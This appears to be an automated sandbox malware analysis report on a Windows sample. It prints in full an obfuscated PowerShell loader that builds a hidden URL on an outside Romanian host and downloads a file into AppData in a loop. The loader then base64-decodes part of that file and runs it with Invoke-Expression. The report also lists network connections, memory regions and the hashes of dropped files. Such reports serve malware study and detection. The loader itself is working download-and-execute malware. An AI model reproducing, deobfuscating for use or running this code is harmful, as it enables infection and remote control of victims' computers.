flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gormezl_6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | synep.ro | udp |
| RO | 31.14.12.249:443 | synep.ro | tcp |
| US | 8.8.8.8:53 | 249.12.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 172.165.69.228:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.35.26:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/472-4-0x00007FFBCC873000-0x00007FFBCC875000-memory.dmp
memory/472-5-0x000002395E810000-0x000002395E832000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phju0gbz.345.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/472-16-0x00007FFBCC870000-0x00007FFBCD332000-memory.dmp
memory/472-15-0x00007FFBCC870000-0x00007FFBCD332000-memory.dmp
memory/472-17-0x00007FFBCC870000-0x00007FFBCD332000-memory.dmp
memory/472-22-0x00007FFBCC870000-0x00007FFBCD332000-memory.dmp
memory/5208-23-0x00000000009B0000-0x00000000009E6000-memory.dmp
memory/5208-24-0x0000000004E10000-0x00000000054DA000-memory.dmp
memory/5208-25-0x0000000004D20000-0x0000000004D42000-memory.dmp
memory/5208-26-0x00000000054E0000-0x0000000005546000-memory.dmp
memory/5208-27-0x0000000005550000-0x00000000055B6000-memory.dmp
memory/5208-37-0x00000000055C0000-0x0000000005917000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 57b72f12fcca4d125d846edcc2cbe71f |
| SHA1 | c7a739fce1454e2d93a9945043c58cb3ea9dfdc0 |
| SHA256 | f1017803af039c8d846cb19949aa540fe28f4eacb0782adcd0335e05097991b8 |
| SHA512 | 21b0bf9ef6ae2bdd99b532fd76f0a5aa8bb973a3f4488da2cf509af0eaf183f08c2724b828f420389008c226baf5a78e8806a771fd8b08efdca1fe00c093c3cd |
memory/5208-39-0x0000000005B70000-0x0000000005B8E000-memory.dmp
memory/5208-40-0x0000000005C10000-0x0000000005C5C000-memory.dmp
memory/5208-41-0x00000000073F0000-0x0000000007A6A000-memory.dmp
memory/5208-42-0x0000000006120000-0x000000000613A000-memory.dmp
memory/5208-43-0x0000000006E40000-0x0000000006ED6000-memory.dmp
memory/5208-44-0x0000000006DD0000-0x0000000006DF2000-memory.dmp
memory/5208-45-0x0000000008020000-0x00000000085C6000-memory.dmp
C:\Users\Admin\AppData\Roaming\Udviklingsegnes.sep
| MD5 | 5aa6003cf7732e15edc986efe8119483 |
| SHA1 | 34de9cbb0ad1cccd509b05d2afd00ce76d80b424 |
| SHA256 | cfe3bcddd69cf6fddd4d04eba24e8918b1140bf887a509b618ae48aeb708a8c2 |
| SHA512 | 62720da12499c803a5a3b03e8e1ff0f20dec0e1e7f81b85f116dba45e3440147bd0f2f269a2055357c5db121d4ca24665e5ed1697ab5092dfaed56ee7581702d |
memory/5208-47-0x00000000085D0000-0x000000000E347000-memory.dmp